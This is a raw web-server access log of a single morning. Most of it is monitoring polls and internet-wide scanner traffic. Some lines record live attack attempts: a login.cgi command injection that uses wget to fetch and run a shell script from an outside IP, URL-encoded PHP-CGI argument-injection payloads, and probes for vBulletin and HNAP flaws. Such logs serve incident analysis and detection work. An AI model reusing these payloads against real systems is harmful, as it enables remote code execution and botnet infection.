212.91.246.72 - - [01/Jan/2021:10:36:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:37:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:38:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:39:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.93.102.236 - - [01/Jan/2021:10:39:02 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:39:07 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:39:24 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:39:34 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:39:46 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:10:40:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.73.41 - - [01/Jan/2021:10:40:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [01/Jan/2021:10:41:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:42:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.93.102.236 - - [01/Jan/2021:10:42:43 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:42:44 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:42:49 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:10:42:52 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:10:43:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:45:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
158.174.231.241 - - [01/Jan/2021:10:45:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:10:46:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.45.1.101 - - [01/Jan/2021:10:46:53 +0100] "HEAD http://123.125.114.144/ HTTP/1.1" 200 - "-" "Mozilla/5.01719037 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
113.128.105.18 - - [01/Jan/2021:10:46:54 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
121.57.231.237 - - [01/Jan/2021:10:46:55 +0100] "GET http://www.wujieliulan.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
49.118.201.235 - - [01/Jan/2021:10:46:55 +0100] "GET http://www.123cha.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
116.1.220.198 - - [01/Jan/2021:10:46:58 +0100] "GET http://boxun.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
123.158.48.114 - - [01/Jan/2021:10:46:59 +0100] "GET http://www.rfa.org/english/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:10:47:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.191.156.79 - - [01/Jan/2021:10:47:00 +0100] "CONNECT cn.bing.com:443 HTTP/1.1" 405 341 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
221.213.75.69 - - [01/Jan/2021:10:47:02 +0100] "CONNECT www.voanews.com:443 HTTP/1.1" 405 345 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
124.235.138.56 - - [01/Jan/2021:10:47:03 +0100] "GET http://www.epochtimes.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
106.45.0.39 - - [01/Jan/2021:10:47:03 +0100] "CONNECT www.ipip.net:443 HTTP/1.1" 405 342 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
212.91.246.72 - - [01/Jan/2021:10:48:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:49:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:50:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:51:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:52:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.236.177.162 - - [01/Jan/2021:10:52:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
186.121.250.247 - - [01/Jan/2021:10:52:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jan/2021:10:53:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:54:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.122.7.61 - - [01/Jan/2021:10:54:35 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
89.211.250.120 - - [01/Jan/2021:10:54:52 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [01/Jan/2021:10:55:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:56:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.218.231.66 - - [01/Jan/2021:10:56:01 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [01/Jan/2021:10:57:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.236.177.162 - - [01/Jan/2021:10:57:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
193.239.147.228 - - [01/Jan/2021:10:57:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Jan/2021:10:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:10:59:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:00:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:01:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:02:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:03:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.236.177.162 - - [01/Jan/2021:11:03:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [01/Jan/2021:11:04:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:05:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:06:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:07:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:08:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:09:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:10:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:11:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:12:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:13:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:14:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.78.130.4 - - [01/Jan/2021:11:14:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Jan/2021:11:15:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.103.146.87 - - [01/Jan/2021:11:15:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.9.1"
203.78.130.4 - - [01/Jan/2021:11:15:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Jan/2021:11:16:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.78.130.4 - - [01/Jan/2021:11:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:17:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:17:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:17:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.78.130.4 - - [01/Jan/2021:11:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Jan/2021:11:18:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:19:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:20:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:21:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:22:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:23:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:24:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.239.242.162 - - [01/Jan/2021:11:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jan/2021:11:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:26:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:28:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:29:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:30:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:32:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:34:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:35:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:36:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:36:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:36:32 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:36:32 +0100] "POST /Admin54f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:36:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:36:57 +0100] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:36:57 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:36:57 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:36:58 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Jan/2021:11:37:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:37:21 +0100] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:37:45 +0100] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Jan/2021:11:38:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:38:11 +0100] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
113.53.152.120 - - [01/Jan/2021:11:38:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
106.13.208.37 - - [01/Jan/2021:11:38:35 +0100] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
162.142.125.53 - - [01/Jan/2021:11:38:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.53 - - [01/Jan/2021:11:38:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
106.13.208.37 - - [01/Jan/2021:11:38:59 +0100] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Jan/2021:11:39:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.208.37 - - [01/Jan/2021:11:39:23 +0100] "POST /forums/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
106.13.208.37 - - [01/Jan/2021:11:39:47 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.208.37 - - [01/Jan/2021:11:39:47 +0100] "POST /bbs/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.208.37 - - [01/Jan/2021:11:39:48 +0100] "POST /forum/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.208.37 - - [01/Jan/2021:11:39:48 +0100] "POST /forums/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
106.13.208.37 - - [01/Jan/2021:11:39:49 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:39:49 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:39:49 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
106.13.208.37 - - [01/Jan/2021:11:39:49 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
